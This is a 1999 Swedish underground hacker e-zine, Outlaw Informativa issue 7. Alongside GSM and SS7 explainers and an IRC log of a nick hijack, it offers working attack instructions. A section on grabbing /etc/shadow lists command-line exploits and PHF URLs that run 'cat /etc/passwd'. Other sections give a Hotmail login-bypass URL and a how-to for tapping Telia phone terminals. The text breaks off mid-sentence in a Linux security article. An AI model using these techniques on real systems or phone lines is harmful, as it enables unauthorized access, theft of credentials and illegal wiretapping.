OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Heretics Inc. tar o presenterar....
[ Outlaw Informativa ]
issue 7, 99-09-08
___________________
O U T L A W 7
September 7, 1999
___________________
- A Heretics Inc. Production -
"Those who desire to give up freedom in order to gain
security, will not have, nor do they deserve, either
one".
-Thomas Jefferson
Nu ska jag (EDITOR) aka BLÄÄ skriva en liten intro och lite annat skit som
vi alltid brukar göra. Tja, nu är det regnigt och skitigt...det är såna dag-
ar man sitter och myser framför närmsta lilla Utvecklings miljö *mysa*
Nu vill jag uppmana alla att inte klaga på stackars crazy-train, han har så
inni helvete inte rippat nåt i artikeln om GSM.......jaja, Jag tror fan jag
tar och skiter i artikeln om Mellanförstärkare som jag snackade om i förra
numret. Jag kan för lite om dom och verkar ganska ointressanta. Hmm, just
fan...va gillade ni min GSM security artikel? c0l4..nää, det e lugnt du
behöver inte klaga på den; jag vet vad du tycker om allt jag gör, så är det
ju när man är FJÅRTIS !!..men kom ihåg 14 är en ålder och inte lixom en stil
eller typ av blod..ähh, skit samma. Jag har varit ute med Segelbåten också,
1 vecka dess verre..men de va skönt som fan men man längtade hem till datorn
och lukten av gata. Nu ut och haxxa VMS burkar nu. Jag är inte elajt jag är
bara 0nd och står för mitt citat 0ndska är Kärlek. Lite annat shit också,
o-i var ju förut men nu är det en blandning av seriöst och humor/ironi.
C:\> type C:\WINDOWS\SYS.LOG
Begin of Microsoft(C)(R)osv..osv..osv.., System LOG
Nope, no fraud on your .comp today just Bill Gates looking at funny porn
pics.
C:\>
Min humor är så dålig att den är bra, det är det som är poängen, snorrrk.
-----------------------------------------------------------------------------
Disclaimer
-----------------------------------------------------------------------------
All denna skitiga information är bara till för utbildningssyfte och sånt
tjafs. Så du får fan ta ansvar för dina egna handlingar om du skulle
hamna i bur pågrund av utföringar av informationen som man faktiskt kan
läsa här. Kiss och Bajs ålder på oss som gömmer sig bakom en Disclaimer, det
är ju alltid bra att ha en...paranoid aka diox1de.
-----------------------------------------------------------------------------
Medverkande
-----------------------------------------------------------------------------
Jo fan såklart man måste ha en lista på alla som är med och skriver till just
detta issue. ÄHHH...här är den !
Alias: diox1de Contact: keytrace@usa.net
¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: dthl Contact: #Phreakerz@DALnet
¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: ncode Contact: #swehack@DALnet
¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Alias: crazy-train Contact: #Phreakerz@DALnet
¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
-----------------------------------------------------------------------------
w w w . i n t e u p p e ä n . c o m
I N N E H Å L L S F Ö R L E K N I N G
¤ Staff
1:1 . Editor
1:2 . Disclaimer
1:3 . Medverkande
1:4 . Innehållsförlekning
1:5 . Aktuellt
1:6 . Outlaw Informativa söker skribenter
¤ Phreaking och Phelefoni
2:1 . Säkerhet i GSM systemet, del #2 av: diox1de
2:2 . GSM telefonen och dess funktion av: crazy-train
2:3 . SS7 - Den magiska signalen av: diox1de
2:3 . Adapter för vita terminaler av: dthl
2:4 . Polisen tvingar telebolagen, arghh av: diox1de
¤ Hacking, Networking och Unix
3:1 . msg'a kanalen du är bannad på av: diox1de
3:2 . Vem som helst kan läsa din Hotmejl av: diox1de
3:3 . 0ldschool Hacking: /etc/shadow av: diox1de
3:4 . Linux Säkerhet Administration av: diox1de
3.5 . Cisco kommando lista av: ncode
3:6 . Ethernet kort till Windows CE av: diox1de
3:7 . Svenska hackers hackade NASA, busted ! av: diox1de
¤ Bomber (Hjälp!)
4.1 . Svin lätt & rolig Bomb av: dthl
¤ Snusk och slut på numret
5:1 . Copyright
5:2 . 3x1t3d(), eller nåt
-----------------------------------------------------------------------------
Aktuellt
-----------------------------------------------------------------------------
¤ Knash's nick övertaget
Knash fick reda på att hans nick blev övertaget runt midnatt den 31 august-
i. Den lilla fjårtis till lamer sig sig ha sniffat nickserv med ett elajt
h4xx0r program som han med självklarhet inte alls skrivit själv. Eftersom
nickserv skickar ident requests som är i form av kommandon i klartext så är
det fullt möjligt att sniffa nickserv. Knash har bytte nick temporärt till
dcrypt men har nu ett fast nick (diox1de) nuvarande diox1de snackade med
lamern som säger att hans orginala nick är [f]LASH, men inget är klargjort
än.
$ log beginning
knash^ (fIKUS@z2-1-76.sbbs2.net)
<knash^> jaha
<knash^> hejhej
<knash^> :)
<Dcrypt> vem e du ?
<knash^> åke
<knash^> å du ä knash
<knash^> dum du ä å ger bort ditt pass
<Dcrypt> det har jag inte gjrot
<Dcrypt> gjort even
<knash^> j
<knash^> o
<Dcrypt> hmm..skicka log
<knash^> jag ä ivil haxxor å snodde ditt nick
<knash^> :)
<Dcrypt> å så ivil du är, varför gjorde du det då?
<knash^> [Knash^(me@t3o29p13.telia.com)] identify secretcpp
<knash^> :)
<Dcrypt> sniffade du eller ?
<knash^> yeye... whatevah :)
<knash^> tycker att ni på #swehack ska sluta snacka om att ni ä så elit
hela tiden å göra nåt åt saken
<Dcrypt> hehe, jag har inte sagt att jag e l33t..
<knash^> tsss
<knash^> men du får inte tebax ditt nick iaf :)
<knash^> om jag får ett shell så fåru det
<knash^> :)
<Dcrypt> jag har inge shel
<Dcrypt> shell
<knash^> fixa då
<knash^> :)
<Dcrypt> ähh.
<knash^> jo
<Dcrypt> nej...Är du så lam så att du tar över nåns nick och utpressar per-
sonen så kan du lika gärna behålla det
<knash^> haha
<knash^> lam?
<knash^> vill ha mer shells juh!
<Dcrypt> då är det inte din dag i dag
<knash^> mohaha
<knash^> tar över nåns nick? det va juh du som gav det till mej
<Dcrypt> ja visst du
<Dcrypt> skicka loggen da
<knash^> har redan visat dej
<Dcrypt> bytt passwd har du gjort också, ännu mer elajt
<knash^> javet
<knash^> annars kan juh du ta tebax det :)
<Dcrypt> inte mot nåt shell iasfs
<knash^> tss
<knash^> haru nåt att trada då?
<knash^> ftp?
<Dcrypt> nepp, du får inget av mig iafs
<knash^> haha
<knash^> oOOoOo
<knash^> nuker
<Dcrypt> snacka inte skit om dig själv
<knash^> haha
<knash^> lamer
<Dcrypt> Har du kul ?
<knash^> ja
<knash^> :)
<knash^> bara så du vet så ä jag [f]LASH å fLAERP å jag sniffade nickserv
så jag har på alla som identifyade då
<knash^> :)
<Dcrypt> k, den där [f]LASH verkar inte kunna ett skit
<knash^> hehe
<knash^> ne javet
<knash^> han ä jätte lam
<knash^> ojoj
<knash^> d ä JAG dsom ä [f]LASH din nolla å jag ä mer elit än du nånsin
kommer bli
<knash^> :)
<Dcrypt> Du fattar inget, klart jag vet att flash e du..
<knash^> lamer du ä
<knash^> sluta snacka i gåtor då
<Dcrypt> eftersom du är så jävla l33t så borde du fatta hur man snackar.
<Dcrypt> Säg nåt du kan
<knash^> typ en massa.. lite c.. lite linux.. massa win :).. ganska lam men ändå
mer leet än du
<Dcrypt> skulle inte tro det
<Dcrypt> win är inget att kunna
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
<Dcrypt> Jaja, bestäm själv..ge mig tillbaka nicket eller behåll det
<knash^> behåller
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
<Dcrypt> Din fula lamer
<knash^> hihi
<Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till
<Dcrypt> !
Som ni ser så visste inte den som kallar sig [f]LASH (muwahah, lamt nick)
vad Public/Private key andvänds till.
-----------------------------------------------------------------------------
Outlaw Informativa söker skribenter
-----------------------------------------------------------------------------
Outlaw Informativa eller gruppen söker medlemmar som har hyffsad kunskap och
inte har nåt emot att skriva. Man ska ha fler kunskaper än Phreaking, vi vill
inte ha en massa lajta beige-boxers här. Outlaw Informativa har aldrig skriv-
it om hur man bygger en LMHS och kommer aldrig att göra.
Bra att kunna om du vill bli med:
Hacking (Nätverk, Bakdörrar etc) Unix (hur det funkar, säkerhet, nätverk)
Phreaking (Växlar, signalsystem etc) Programmering (t.ex. Assembler, C/C++,
Java osv) Kryptering (Nyckelhantering, algoritm strukturer osv)
Detta är absolut inga krav, men har du kunskaper kring detta är det stor
chans att du kan bli en av oss ;)..Så länge du har nåt att skriva om och
vet ditt syfte till att skriva och ger ut bra information sånt som folk
läser och inte kastar bort.
Maila keytrace@usa.net om du vill bli 0n3 0f us =)
-----------------------------------------------------------------------------
Säkerhet i GSM systemet, del #2
-----------------------------------------------------------------------------
[Inledning]
I första delen om GSM säkerhet skrev jag om hjärtat "Subscriber Identity Aut-
hentication, hur det funkade teoretiskt och vilka algoritmer som andvändes
till vad. För att läsa den här delen behöver du lite förståelse för olika
element i kryptering, men jag kommer hjälpa till lite endå :P
[A5 i teorin]
A5 som ni kanske inte kommer ihåg (om inte, kolla Outlaw-06) krypterar tal
mellan 2 mobilphelefoner med nyckeln Ki, mkt mer behöver du inte fatta om du
vill ha en mer omfattande förklaring så läs outlaw-06, uhmm...damn jag står
och tjatar om outlaw-06 hela tiden...denna artikel är ju baserad på att man
läst Del #1. Observera att det här är delvis rippat eftersom jag själv inte
fattar riktigt allt, men texten är ju skriven för er :) Jo föressten det är
10% rippat så att ni inte tror att jag rippat 90% av den, beheeh.
A5 är ett "streamcipher" som skapas av tre LSFR (Linear Feedback Shift Regi-
ster) av graderna 19, 22 och 23.
Newbie note: Ett streamcipher är teknik vid kryptering, den krypterar en bit
i taget med hjälp av en keystream.
Klockkontrollen är en slags tröskel funktion av de mittersa bitarna i de tre
olika skift-registren.
Summan av graderna för skift-registren 64 (19+22+23) och då andvänds alltså
en 64-bits "session key" för att initiera regstren.
Newbie note: Session Key är en symmetrisk nyckel och det innebär att den
andvänds både vid kryptering och dekryptering.
Sen matas det 22-bitars ramnumret in i TDMA registret.
För varje TDMA skapas två 114-bitars keystreams sedan gör en XOR på Downlink
och Uplink (Trafiksignaler)
Newbie note: 890 och 915 MHz används för Uplink och 935 och 960 MHz för
downlink. Uplink menas kommunikationen mellan phelefon till ba-
sstation medans Downlink används för kommunikation i motsatt
riktning.
Säkerheten i detta beror på hur cepe man är. Har man inte tillräcklig längd
på nyckeln och hur passa bra "keystreams" är och hur slumässigt generard
den är.
Lite info här kanske är lite lik "Att förstå Telekommunikation" och det kan-
ske beror på att jag fått infon där ifrån.
[Slutord]
Mer om GSM Säkerhet kommer i Outlaw Informativa, issue #8 där jag hade tänkt
att ta upp mer om olika egenskaper i GSM systemt.
-----------------------------------------------------------------------------
GSM telefonen och dess funktion
-----------------------------------------------------------------------------
En GSM-telefon kan beskrivas med ett blockschema.
Här kommer detta och det beskriver en GSM-telefon's sändare och mottagare.
_______
| GSM |
|Telefon|
|_______|
_____/ \_____
/ \
_______________|___ _____|________________
270 kbit/s --> [Moduleringssänadare]-------------[Mottagare/demodulering]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________|___ _____|___
33,8kbit/s --> [Skur-formatering]-------------[Utjämnare]
¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯
______|___ _____|______
[Kryptering]-------------[Dekryptering]
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
________|___ _____|________
[Interleaving]-------------[Deinterleaving]
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯
456bitar/20 ms --> ________|___ _____|_
22,8 kbit/s [Kanaldekoder]-------------[Decoder]
¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯
260bitar/20 ms --> ______|___ _____|______
13 kbit/s [Talkodning]-------------[Talavkodning]
¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯
160 samples * 8 bitar/20ms --> ____|___ _|_
[Segmentering] [D/A]
¯¯¯¯¯¯¯¯|¯¯¯ ¯|¯
8000 samples/s * 8 bitar --> _|_ _____|___
[A/D] [Högtalare]
¯|¯ ¯¯¯¯¯¯¯¯¯
____|___
[Mikrofon]
¯¯¯¯¯¯¯¯
Här nedanför kommer jag bara ta upp de mest intressantaste bitarna av blocks-
chemat.
Talkodningen-
Bithastigeten 64kbit/s för talöverföringen är en alldeles för stor informati-
onsmängd för tt effektivt uttnyttjande av nätet. Man inför talkodning vilket
innebär att man skapar en kopia av det mänskliga talorganet. Vårat talorgan
arbetar relativt långsamt och man kan utan alltför stor avvikelse från
verkligheten räkna med att det inte ändrar karaktär mer än ar 20 ms. Talet
analyseras under 20 ms. Med hjälp av motsvarande utrustning i mottagaren
omvandlas signalen till ett s k syntetiskt eller konstgjort tal. På detta
sätt kan överföringshastigheten minskas till 13 kbit/s.
Talkodningen är konstruerad för talsignaler och är inte lämplig för
överföring av andra signaler, t ex rena datasignaler från datorer och faxar
som är anslutna till mobiltelefonen. Dessa ansluts via ett särskilt modem.
Och signalerna passerar inte denna talkodaren som kortar ner överföringshast-
igheten, utan man kan köra på i c:a 64kbit/s.
Kanalkodningen-
Kanalkodningen innebär att man kan upptäcka och korrigera fel i den mottagna
bit-signalen. Det finns då ytterligare bitar tillgängliga, som används som
kontrollbitar eller checkbitar. Dessa bitar ger mottagaren möjlighet att
korrigera fel som uppstått, t ex på grund av störningar i överföringen.
Interleavingen-
Interleaving är en metod att ytterligare minska felen i överföringen. Kanalk-
odningen rättar kortvariga fel, fel i enstaka bitar Med interleaving kan mera
"långvariga" fel korrigeras, dvs interleavingen motverkar att flera bitar
följande varandra försvinner. Detta sker genom att den digitaliserade
signalens bitar inte sänds i logsk följd utan bitarna i ett 20 ms-block sänds
iväg i en annan följd, vilket gör att inte nånting stämmer.
Kryptering/Formatering-
Kryperingen ska fungera så att det ska vara "omöjligt" för utomstående att
avlyssna samtalet. I mobiltelefonens processor finns en krypteringsnyckel
lagrad. Var gång telefonen försöker registrera en ny postition eller koppla
upp ett samtal, kontrolleras abonnentens identitet. Från MSC skickas ett slu-
mptal till telefonen. Med hjälp av en algoritm som tillhör nyckeln beräknas
ett svar, som telefonerna skickar tillbaka till MSC och vidare till VLR som
kontrollerar att svaret är korrekt. Om svaret inte är korrekt, så finns
abonnemanget hos någon annan operatör eller
är av någon anledning inte längre giltigt.
När data sänds, krypteras dessa i telefonen med hjälp av den "inbyggda"
nyckeln och det översända slumptalet. Den krypterade signalen tas emot av
nätet, som omkyrpterar signalen så att den passar till mottagarens nyckel och
det slumptal som översänts till denna. Om allt är korrekt sker en dechifferi-
ng i mottagartelefonen.
Efter att meddelandet krypterats i sändartelefonen, sker något som kallas för
skur-formatering. Det betyder att informationen på läpmligt sätt kombineras
med information om den kanal som kommer att användas för sändningen.
Efter dessa ingrepp ligger datahastigheten på c:a 33,8 kbit/s.
Nu än sålänge har vi gått igenom det mest intressanta steg-för-steg i vad som
egenligen händer i din lilla nalle :)
Nu ska jag gå in lite djupare in på ämnet "Modulering/sändning":
Mobiltelefonen arbetar på frekvensområdet 900 MHz. Det aktuella frekvensområ-
det ligger mellan 890 och 915 MHz vid sändning och 935 och 960 MHz vid
mottagning. Frekvenskillnaden mellan den s k bärvågen vid sändning respektive
mottagning är 45 MHz. Avståndet mellan två kanaler ska vara 200 kHz. I
vardera sändningsriktningen finns därför totalt 124 kanaler att dela på. På
grund av att flera delar på dessa. 124 kanaler, har varje GSM-operatör i
Sverige 4,8 MHz, dvs 24 kanaler till förfogande för sin egna trafik.
Bärvågen, t ex 900 MHz, är en sinusformad signal som alstras på sändaren. Den
informationen som ska överföras, får på något sätt förändra bärvågen från
sändaren. Detta kan ske genom att amplituden, frekvens eller fasläget påverk-
as. Detta kallas för modulering som ni kanske vet :)
GSM använder en typ av fasmodulering. Bärvågen innehåller alltså en avikelse
från den ursprungliga sinuskurvan som motsvarar våran krypterade information.
Nu gäller det att utnyttja de 24 kanaler så effektivt som möjligt. Genom att
utnyttja en typ av timesharing kan 8 förbindelser etableras per kanal. Man
kan säga att varje sändningsperiod delas upp i 8 intervall och i ett sådant
placeras vår formaterade skur av krypterad information. Efter moduleringen är
datahastigheten 270 kbit/s Räckvidden är begränsad för en basstation och en
telefon är maximalt något tiotal km vid frekvenser av 900 MHz, kan samma
användas av flera basstationer utan att detta stör överföringen. Det gäller
endast att fördela kanalerna mellan basstatuinerna på ett intelligent sätt.
Varje basstation täcker en cell. Ett antal celler bildar tillsammans ett
cluser och tillgängliga kanaler fördelas på dessa celler. Detta innebär att
samma kanal används för övering av många samtal, och det är inte alls säkert
att sändande telefon och mottagande telefon använder samma kanal. Det viktiga
är att de akuella uppkopplingarna finns så långt ifrån varandra att de inte
stör varandra. Det innebär också att när du lämnar en cell, kan du, naturlig-
tvis automatiskt, kopplas om till en annan kanal under pågående samtal.
Aktuellt MSC sköter om kanalvalet.
Nätet-
Nu säger vi att din krypterade signal kommit ut på nätet. I det fasta telenä-
tet är överföringskapaciteten nästan obegränsad. Här förs den vidare till den
operatörs nät som den abonnent du anropat är ansluten till. Sedan förs den
vidare till den MSC som din talmottagare är uppkopplad till. Anpassningen är
kryptering sker till mottagarens kodnyckel och algoritm.
Ok nu har vi gått igenom sändnings-delen.
I nästa nummer av Outlaw Informativa ska jag skriva lite om mottagardelen,
vilket är lite mindre komplicerat.Ok nu skriver jag in vad alla förkortningar
jag använt betyder.
GSM = Global System for Mobile Communications, eller på svenska : globalt
mobil-kommunikationssystem.
NMT = Nordic Mobile Telephone System (analogt system, omtalat i 900 MHz
frekvensen om ni inte visste detta)
MSC = Mobile Switching System
VLR = Visitor Location Register = "besökregister".
-----------------------------------------------------------------------------
[Grundläggande] SS7 - Den magiska signalen
-----------------------------------------------------------------------------
Innhåll:
¯¯¯¯¯¯¯¯
--> Inledning
--> in-band/out-band signalering
--> Associerad signalering
--> Olika funktions element i SS7
[Inledning]
SS7 är ett ett Digitalt Signallerings Nätverk som avänds för att koppla och
hantera kommunikationen på de allmäna telenätet, det kallas "Smart Network"
och menas att det har inbyggda funktioner i själva nätverket. SS7 är uppdelat
i olika delar och varje har sin egen funktion att hantera. Eftersom SS7 är
digitalt kan man andvända den till andra saker t.ex. D-kanalen för ISDN.
SS7 har också möjligheter att kunna överföra multimedia som bild, ljud och
data. Teletrafik och Datatrafik sänds över olika kanaler eftersom det är
olika krav på utrustning, datatrafik kräver grymmt mycket högre bandbredd än
teletrafik.
SS7 = Signalling Systems 7
[in-band/out-band signalering]
Från början va SS7 ett "multi frequency in-band- telephony signalling system"
men har nu ersatts med "common channel out-of-band signalling system"
Från början va det tänkt att SS7 bara skulle förnya den gamla tekniken att
koppla upp och hantera teletrafik men har nu fått andra andvändningsmöjlighe-
r, SS7 kan t.ex. transportera ISDN signaler som andvänds vid Internet-Kommun-
ikation. För att du ska förstå vad in-band och out-band signalling är måste
det finnas en enkelt förklaring och jag hoppar inte över nåt. In-band signal-
ling är när ALL information går genom samma. Out-band signalling är lite
annorlunda. Out-band signallning etablerar en separat digital kanal för
växling av signal information. Denna kanal kallas för "Signal Länk". Signal
Länkarna är till för att hantera all nödvändig information i signalering
mellan olika noder. Så, vad är det som är så bra med out-band signalering då?
--> out-band signalling tillåter transport med högre hastigheter med mer
data. 56kbps kan hantera data så grymt mycket snabbare en
"Multi Frequency Outpulsing"
--> out-band tillåter att starta signalering när som helst och var som
helst.
--> out-band gör det möjligt att signalera till olika funktioner i nätverk-
et där det inte är nån "Direct Trunk Connection".
[Associerad signalering]
En typ av associerad signalering
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
|¯¯¯¯¯¯¯¯|***************************|¯¯¯¯¯¯¯¯|
| |¯¯¯¯| |***************************| |¯¯¯¯| |
| |Växel |***************************| |Växel | (Ful ASCII, by diox1de(C)
| | #1 | |***************************| | #2 | |
| | | |***************************| | | |
| |____| |---------------------------| |____| |
| | | |
¯¯¯¯¯¯¯¯ * = "Voice Trunk" ¯¯¯¯¯¯¯¯
- = "Signalling Link"
Associerad signalering funkar bra så länge växeln bara kraven för signalerin-
gen är mellan sig själv och andra växlar. "The North America implementers"
ville designa ett SS7 nätverk som gjorde det möjligt att vilken "node" som
helst skulle kunna växla signaler med vilken övrig SS7 kabel node" som helst.
Fast Associerad Signalering blir mycket mer kompilcerat när man ska växla
signaler mellan olika "noder" som inte har någon fast anslutning.
[Olika funktions element i SS7]
SSP : Service Switching Points
Är en telefon-växel med inbyggd mjukvara för Signallings Systems 7 och
Hanterar uppkopplingar och addressering av anrop. Kan också andvändas
för att ställa frågor till en Central databas (SCP) om vilken väg
en förbindelse ska kopplas upp vid. SSP är själva porten till SS7 näte-
t.
STP : Signal Transfer Points
Hanterar nätverkstrafiken mellan olika signalerpunkter. STP kollar
information i SS7 paketen för att veta var den ska vidarbefoga paketet.
Detta kan vara en liknelse hur en HUB arbetar. En signalpunkt andvänder
en "Routing table" för att veta var paketet ska någon stanns.
SCP : Service Control Points
Är en typ av databas som kan kolla information och verifiera t.ex.
kreditkort.
[Efterord]
Hoppas du fattade nåt iafs..och sen får jag inte glömma källa satt inga idio-
ter får för sig att jag rippar =)
Jag gjorde det väldigt grundläggande nu, faktiskt så började jag skriva avan-
cerat hur nätet fungerade och vilket element som kommunicerade med vilket men
eftersom jag inte alls lyckades med att göra en tydlig ascci bild så blev det
inget av det, om du skickar nåt liten dos program till mig som kollar alla
pixlar och sånt och formar om en bild till ascii så kan jag nog ta mig i
kragen och skriva en avancerad del.
Maybe be to continued...
Källa: --> Att första Telekommunikation
--> Illumient, Signalling Systems 7.
-----------------------------------------------------------------------------
Adapter för vita terminaler
-----------------------------------------------------------------------------
Ok, nu börjar vi då. Den vita terminalen är en förnyad version av den "gamla"
svarta terminalen med skruvar. Nuförtiden så byts en del gamla terminaler ut
mot de nya, därför telia gör detta är att förhindra missbruk, fast det är ju
lätt att gå igenom det ändå. I bland så sitter det adapters på vit terminale-
n, ( adaptern gör beige-boxing från vita lätt som en plätt ) jag tror att
adaptern är till för linjemannens special lmhs, det brukar sitta en adapter
på nästan alla vita terminaler, men sitter det ingen adapter där du ska beiga
så är det bara att bryta upp en annan japp och ta lös adaptern och sätta den
på den viting som du ska abusa. De flesta vet hur en vit terminal, om du inte
vet det så kan du ta en titt på vsp's bildarkiv och vet du inte hur en
adapter så kan du kolla på den hära fina ascii bilden:
_______ _______
/ | | \
| |_________________________________________| |
| ___/ \___ |
| | ____ _____ _____ _____ _____ _____ | |
| |___ | | | | | | | | | | | | ___| |
| \ |___| |___| |___| |___| |___| |___| / |
| |__________________________________________| |
| | | |
\_______ ____/
Jag vet att denna bild inte säger så mycket men jag ska fota en sedan, fast
här är lite mer fakta om adaptern, den är grå och på ovan sidan står det:
A952 7569 8840. På varje adapter finns det 10 linjer ( som på vita och svarta
terminaler ) och alltså 20 hål. Du löddar/binder fast nålar eller två små
plåtbitar på beige linan och stoppar in två hål. Sådär ja! nu har du lärt dej
hur man beigar från vitingar.
// dThl
[Knash fyller i: Finns på bild på adapter på:
http://members.xoom.com/firecrew/pics/vit.jpg]
-----------------------------------------------------------------------------
Polisen tvingar telebolagen, arghh
-----------------------------------------------------------------------------
Farbror blå suger stock ! klart att det alltid finns en väg ut men nu ska
snuten försämra för oss, dom tvingar Telebolagen att dom också ska kunna ha
access till att avlyssna krypterade samtal och få fram klartext. Det ska
alltså finnas en massa onödig hårdvara och program för att få encrypted till
cleartext, uurk. På riksdagens fula bord ligger det redan ett fult lagförslag
(proposition 1994/95:227) om ändring av rättegångsbalken) .....det börjar bli
sorgligt nu. Jäjä, vi kan väl skaffa en algoritm som är omöjlig att forcera.
Men hur lång tid kommer det ta ? ..och hur många fattar så mycket att de kan
va med ? inte speciellt många, inte heller jag...Nu pallar inte jag mer arti-
keln e slut kanske.
-----------------------------------------------------------------------------
msg'a kanalen du är bannad på
-----------------------------------------------------------------------------
Jag satt och plinkade på IRC och diskuterade på #Nuke.se hur allvarligt DoS
egentligen är, nä....men de enda intressanta med DoS är hur det funkar...
TCP/IP, UDP osv. är ju inte byggda för att kunna krasha andra hosts. Sen blev
jag ju bannad såklart sen testade jag skriva /msg #nuke.se nuke l337s...jao
och det funkade, vetta fan om det är inbyggt eller om det är en bug. Låt oss
säga att det är en bug, mkt roligare så. Ja men vi synns på #2,000. Hmm, läg-
ger till lite på artikeln efter som är märkt lite saker. Detta kallas för
External Message och fungerar bara om kanalen har satt +n (No external Messa-
ges)
Sen blir man ju tvingad att tacka Bhunji som gav förslag på topicen, ville
inte låta de se löjligt ut, BLÄÄÄ.
-----------------------------------------------------------------------------
Vem som helst kan läsa din Hotmejl
-----------------------------------------------------------------------------
Jo som vanligt så är ju Microsoft inga säkerhets experter. Ännu ett liten
lucka i Hotmails system. Du kan läsa vem som helsts account och det är ju
lamt men andvändbart, många miljoner andvänder hotmail och ofta skickas
mail med passwds till ditt nya t.ex. X00M konto.
Connecta bara till:
http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=USERNAME&passwd=eh
Med din favorit HTTP klient. Observera att USERNAME byts ut mot valfritt
username ;)
Detta funkade dock inte länge, redan fixat. Men så ni vet vad hålet va. Är d-
et någon som tekniskt vet hur bakdörren funkade så kan ni skicka en jävel
till mig på keytrace@usa.net.
-----------------------------------------------------------------------------
0ldschool Hacking: /etc/shadow
-----------------------------------------------------------------------------
[Förord]
¯¯¯¯¯¯
Jag tänke förklara ett par gamla godingar, alltså olika tekniker för att kun-
na rycka åt sig /etc/shadow. Jag vill inte ha en massa klagomål på denna
artikel, den är ju inte direkt för avancerad och det är ju inte jag heller =)
[XFREE86]
¯¯¯¯¯¯¯
Detta ska funka på de flesta *nix system som kör XFREE86 och utförs med:
XF86_SVGA -config /etc/shadow
Om det inte är Fredag den 13 och du inte har fått ditt dagliga rövknull av
far din så ska /etc/shadow ge utdata på terminalen.
[Hål i libc 5.4.7]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Jao, i de flesta *nix systemen ska det också finnas ett "Security hole" i
libc 5.4.7 som låter dig sätta resolv_hots_conf till vilken fil som helst. Om
du kan köra ett SUID program som andvänder resolv_host_conf typ ping, tracer-
oute, ssh, rlogin. Om du nu t.ex. andvänder ping så ska ping ge /etc/shadow
som utdata på terminalen.
1. Skriv bash för att starta bash skalet.
2. Skriv export RESOLV_HOST_CONF=/etc/shadow
3. Skriv ett av fil namnen ovan med asdf, t.ex. ping asdf
[Rycka /etc/shadow med dip]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
En del Linux Slackware burkar kan du andvända dip för att exploita root, den
kan också andvändas för att rycka åt sig /etc/shadow.
ln -s /etc/shadow /tmp/buh.dip /sbin.dip -v /tmp/buh.dip
[Gammalt .lastlogin trick]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sen finns det ett gammalt SCO och Sys V .lastlogin trick. Kolla så att .las-
tlogin i ditt hem bibliotek så att den ägs av root eller auth
rm -f ~rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd
Logga nu ut och logga in igen så du kan skapa länken.
cat .lastlogin > passwd
rm -f ~/.lastlogin
[ypcat på möglande Unix system]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sen kan du alltid testa ypcat /etc/passwd som kan funka på söndermöglade
Unix system.
[PHF är en historia]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Egentligen tänke jag inte ta med PHF eftersom det är söndermöglad och att
det inte finns nån server som har PHF hålet. Men det finns faktiskt gamla
Asiatiska system där PHF fortfarnande funkar.
http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
eller kanske...
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd
[Unshadow .c script]
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Kan funka på en del *nix versioner som är gamla som gatan.
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
Källa: shadow.txt
Detta borde läsas av allas petiga typer!
All information i artikeln är inte helt
skrivet med egna ord. Så kom inte och
klaga på att texten är likt de engelska
orginalet.
-----------------------------------------------------------------------------
Linux Säkerhet Administration
-----------------------------------------------------------------------------
Jag är relativt ny på Linux och blev sugen att skriva lite om säkerhet när
jag grubblade igenom axxezz's artikel i SuZ om Linux security. Så jag hade
tänk förklara enkelt om säkerhet i olika dist o unix system i allmännhet.
Jag kommer hålla mig till 2 vanliga dist, ulmhhh...Redhat och Slackware.
För er som inte orkar lusa igenom allt för att veta vad artikeln innehåller
så kan jag berätta det redan nu ;) ...Password Policy, Password Shadowing,
TCP Wrappers, Anonymous FTP, 0nda services och Loggfiler.
[Password Policy]
Nej nu ska jag inte ta upp nåt jävla shit om hur man väljer rätt lösenord
som varenda pc tidning på markaden skriver om eller har skrivit om, jag bryr
mig inte om vilka som andvänder bra lösenord eller inte, det skapar bara för-
delar för omgivninge. Men jag ska däremot ta upp hur man får systeme t att
inte tillåta passwd under 8 tecken osv. Detta är dock mest andvändbart för
admin på nån skola. Men det kan va kul att veta än då.
I Slackware så öppnar du /etc/login.defs med en skön text-editor. De t första
